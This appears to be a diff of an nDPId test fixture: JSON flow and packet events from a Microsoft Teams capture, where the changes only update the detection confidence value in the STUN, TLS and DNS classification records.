00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2521,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1587041693658,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693658,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXfJYAAGwR4NE0cvqNwKgBBg2Ww2EAw+F\/ARMApyESpELalY8VcoE3uJ+0vVMADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+o0AFAAUPpo\/SSn4PJAIkOO6zaqfvtmAt1IAFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6jYCVAAiQUL8kDsWN+oAgAAgAAcwTcadqCg=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693668,"flow_last_seen":1587041693668,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1587041693668,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693668,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgYKIAAEARKUHAqAEGNHL6icN1DZYATE9EAAMAMCESpEJNv3gTxWrFDZ5wS8sADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693668,"flow_last_seen":1587041693668,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693668,"flow_last_seen":1587041693668,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
+00987{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2526,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041693582,"flow_last_seen":1587041693675,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1639,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1587041693675,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2542,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1587041693698,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1587041693698,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC1VxYAAGwRBoY0cvp7wKgBBg2Ww3QAoWPcAQMAhSESpELOvwn047sA+HEU4bYADwAEcsZLxgANAAQAAAA8AAEACAABDZg0cvqJgAgABAAAAAaAIAAIAAHObHGnagqAUAAYmiULR7BQSjV7GJ7mOy6WXuQ5anUAAAAAgCIACTIuMC4xLjIxMQAQAAQAAC7gAAgAIJWLEhTAIKUMzT0EuyGZ9cU94RPVJanGef0JixSMSj4H"} 
00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1587041693711,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693711,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyfgoAAEARC0PAqAEGNHL6jcNhDZYA3rEpAAMAwiESpEJLDXUDhL3sfvdJg10ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIkFC\/JA7FjfoAFAAUPpo\/SSn4PJAIkOO6zaqfvtmAt1IAFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACBfcijkK3I1E6fsjRiPsKvs33Xfpf\/cKnDyh7VrIY168g=="} 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1587041693714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693714,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXVxcAAGwRBlU0cvqJwKgBBg2Ww3UAwwtKARMApyESpEJNv3gTxWrFDZ5wS8sADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+okAFAAUc60+h2VE9PTAWxn4K2V6NOmKA20AFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6iYCVAAjDwJ1K7o6J+oAgAAgAAcBocadqCg=="} 
@@ -438,36 +446,37 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1587041693849,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693849,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf7AqAEGNHL6mcN0AbuMksvlAAAAALAC\/\/8dvwAAAgQFtAEDAwUBAQgKMITaVwAAAAAEAgAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2564,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1587041693869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693869,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZxAAGwGgG40cvqYwKgBBgG7w17cXACa3TTJGIAS\/\/81\/QAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2565,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1587041693869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693869,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShfAqAEGNHL6mMNeAbvdNMkY3FwAm1AQIABWvAAA"} 
-00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2566,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693828,"flow_last_seen":1587041693869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693869,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2566,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693828,"flow_last_seen":1587041693869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693869,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2567,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1587041693893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693893,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0NypAAGwG5t80cvqZwKgBBgG7w3QJhgXYjJLL5oAS\/\/9RUwAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2568,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1587041693893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693893,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShbAqAEGNHL6mcN0AbuMksvmCYYF2VAQIAByEgAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2569,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693849,"flow_last_seen":1587041693893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693893,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2585,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1587041693828,"flow_last_seen":1587041693913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1587041693913,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} 
-01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2603,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041693849,"flow_last_seen":1587041693938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1587041693938,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} 
+00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2569,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693849,"flow_last_seen":1587041693893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693893,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2585,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1587041693828,"flow_last_seen":1587041693913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1587041693913,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} +01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2603,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041693849,"flow_last_seen":1587041693938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1587041693938,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 
5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694219,"flow_last_seen":1587041694219,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041694219,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1587041694219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041694219,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9w\/AqAEGNHJNiOyXAbs8mpamAAAAALAC\/\/8lfgAAAgQFtAEDAwUBAQgKMITbvgAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1587041694221,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1587041694221,"pkt":"EBMx8Tl2KDc3AG3ICABFAABWS5cAAP8R7KfAqAEGwKgBAe2lADUAQpDJn88BAAABAAAAAAAAG2MtZmxpZ2h0cHJveHktZXVuby0wMS10ZWFtcwhjbG91ZGFwcANuZXQAABwAAQ=="} -00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": 
{"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1587041694234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1587041694234,"pkt":"KDc3AG3IEBMx8Tl2CABFAACixyFAADkR9tHAqAEBwKgBBgA17aUAjgAAn8+BgAABAAAAAQAAG2MtZmxpZ2h0cHJveHktZXVuby0wMS10ZWFtcwhjbG91ZGFwcANuZXQAABwAAcAoAAYAAQAAAA4AQARwcmQxDmF6dXJlZG5zLWNsb3VkwDEGbXNuaHN0CW1pY3Jvc29mdANjb20AfaP8PAAAA4QAAAEsAAk6gAAAADw="} -00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041694234,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041694234,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2637,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1587041694262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041694262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0VplAAGwGdII0ck2IwKgBBgG77Jdw4z8APJqWp4AS\/\/+58wAAAgQFoAEDAwgBAQQC"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2638,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1587041694262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041694262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG9yfAqAEGNHJNiOyXAbs8mpancOM\/AVAQIADasgAA"} 
